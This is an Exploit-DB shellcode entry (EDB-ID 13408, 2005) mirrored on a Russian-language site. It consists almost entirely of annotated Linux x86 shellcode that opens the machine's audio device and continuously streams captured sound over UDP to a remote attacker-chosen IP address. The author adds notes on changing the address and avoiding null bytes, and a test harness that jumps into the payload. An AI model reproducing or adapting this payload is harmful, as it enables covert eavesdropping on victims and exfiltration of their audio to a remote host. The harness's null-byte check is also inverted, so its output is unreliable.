- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 13408
- Проверка EDB
-
- Пройдено
- Автор
- PHAR
- Тип уязвимости
- SHELLCODE
- Платформа
- LINUX_X86
- CVE
- N/A
- Дата публикации
- 2005-11-04
C:
/* Placed the listener here http://www.milw0rm.com/down.php?id=1293 /str0ke */
/********************************************************************
hey folks, this is snoop_shell, short and simply it snoops on
/dev/dsp and after attempting to lower the audio quality
will stream any data read on this device over a udp stream
to a remote listening client.. (source should be available at stonedcoder.org)
the port that this will stream on is whatever the high half
of the ip address is, i figured this will always be over 1024
so the client will be usable without root privs.
at 172 bytes, its really bloated for shellcode, but if your
reading this anyway, you probably are just looking to have fun
with it..
remember you'll need to change the ip address before you
actually use it.. and if your unlucky enough to have an
ip address that contains a null.. well.. its on you to fix it..
but you can do that by simply rotating the ipaddress by a bit or
two..
mov $0xE8015180,%ebx #192.168.0.116
ror %ebx #shift right by one bit
no more null
phar[at]stonedcoder[dot]org
*********************************************************************/
char shellcode[] =
"\x31\xc9" //xor %ecx,%ecx
"\x51" //push %ecx # \x00
"\x68\x2f\x64\x73\x70" //push $0x7073642f # /dsp
"\x68\x2f\x64\x65\x76" //push $0x7665642f # /dev
"\x89\xe3" //mov %esp,%ebx
"\x89\xc8" //mov %ecx,%eax
"\xb1\x02" //mov $0x2,%cl
"\xb0\x05" //mov $0x5,%al
"\xcd\x80" //int $0x80 #open /dev/dsp for reading
"\x89\xc6" //mov %eax,%esi #preserve fd in esi
"\x31\xc9" //xor %ecx,%ecx
"\x51" //push %ecx
"\x31\xdb" //xor %ebx,%ebx
"\xb3\x02" //mov $0x2,%bl
"\x53" //push %ebx
"\x53" //push %ebx
"\x4b" //dec %ebx
"\x89\xe1" //mov %esp,%ecx
"\x89\xd8" //mov %ebx,%eax
"\xb0\x66" //mov $0x66,%al
"\xcd\x80" //int $0x80 #create a udp socket
"\x89\xc7" //mov %eax,%edi #preserve socket in edi
"\xc1\xc3\x04" //rol $0x4,%ebx
"\x53" //push %ebx
"\x89\xe2" //mov %esp,%edx
"\xb9\x05\x50\x04\xc0" //mov $0xc0045005,%ecx
"\x89\xf3" //mov %esi,%ebx
"\xb0\x36" //mov $0x36,%al
"\xcd\x80" //int $0x80 #ioctl on fd SOUND_PCM_WRITE_BITS (16 bits per samle)
"\xfe\xc0" //inc %al
"\x89\x04\x24" //mov %eax,(%esp)
"\xfe\xc1" //inc %cl
"\xb0\x36" //mov $0x36,%al
"\xcd\x80" //int $0x80 #ioctl on fd SOUND_PCM_WRITE_CHANNELS (1 channel)
"\xfe\xc0" //inc %al
"\xc1\xc0\x0d" //rol $0xd,%eax
"\x89\x04\x24" //mov %eax,(%esp)
"\xc1\xc8\x04" //ror $0x8,%eax
"\xb1\x02" //mov $0x2,%cl
"\xb0\x36" //mov $0x36,%al #ioctl on fd SOUND_PCM_WRITE_RATE (8khz)
"\xcd\x80" //int $0x80
"\x50" //push %eax
"\x50" //push %eax
"\x89\xc2" //mov %eax,%edx
/* prepare an area on the stack that looks like an struct in_addr */
/*your ipv4 ip address*/
"\xbb" "\xc0\xa8\x0f\x2e" //mov $0x7401a8c0,%ebx #your ipaddress would go here currently set to 192.168.1.116
"\x53" //push %ebx
"\xc1\xe3\x10" //shl $0x10,%ebx
"\xb3\x02" //mov $0x2,%bl
"\x53" //push %ebx #port and family, (we'll use use the hi half of the address for a port)
/* allocate 1025 byte buffer on the stack */
"\x89\xe3" //mov %esp,%ebx
"\x66\xba\x01\x04" //mov $0x401,%dx #create the space on the stack (1025 bytes)
"\x29\xd4" //sub %edx,%esp
"\x89\xe0" //mov %esp,%eax
"\x31\xc9" //xor %ecx,%ecx
"\xb1\x10" //mov $0x10,%cl
"\x51" //push %ecx
"\x53" //push %ebx
"\x31\xc9" //xor %ecx,%ecx
"\x51" //push %ecx
"\x52" //push %edx
"\x50" //push %eax
"\x57" //push %edi
"\x89\xc2" //mov %eax,%edx
"\x89\xcb" //mov %ecx,%ebx
"\x89\xc8" //mov %ecx,%eax
"\x89\xe1" //mov %esp,%ecx
"\xb3\x0b" //mov $0xb,%bl
"\xb0\x66" //mov $0x66,%al
"\x51" //push %ecx
"\x89\xe7" //mov %esp,%edi #registers and stack are prepared for call to sendto
"\x60" //pusha #push regs onto stack
"\x89\xf3" //mov %esi,%ebx
"\x89\xd1" //mov %edx,%ecx
"\x89\xd8" //mov %ebx,%eax
"\xb0\x03" //mov $0x3,%al
"\x89\xc2" //mov %eax,%edx
"\x66\xba\x01\x08" //mov $0x401,%dx #registers are prepared for call to read
"\x60" //pusha #push regs
"\x89\x27" //mov %esp,(%edi) #store this stack pointer in the memory allocated above
/*loop:*/ // #so that we can restore it for the loop
"\x61" //popa #pop prepared registers from stack
"\xcd\x80" //int $0x80 #call read
"\x61" //popa #pop registers again
"\xcd\x80" //int $0x80 #call sendto
"\x8b\x27" //mov (%edi),%esp #pulls from the memory allocated before and restores esp
"\xeb\xf6" //jmp 80483f5 <loop>
;
int main() {
int *ret;
char cnull = 0;
printf("shellcode_size: %u\n", sizeof(shellcode));
printf("contains nulls: ");
if(!memmem(shellcode,sizeof(shellcode),&cnull,1)){
printf("yes\n");
}else{
printf("no\n");
}
ret = (int *)&ret + 2;
(*ret) = (int)shellcode;
}
// milw0rm.com [2005-11-04]- Источник
- www.exploit-db.com
